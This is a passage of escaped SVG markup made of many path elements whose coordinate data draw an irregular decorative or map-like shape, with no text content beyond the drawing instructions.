d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path 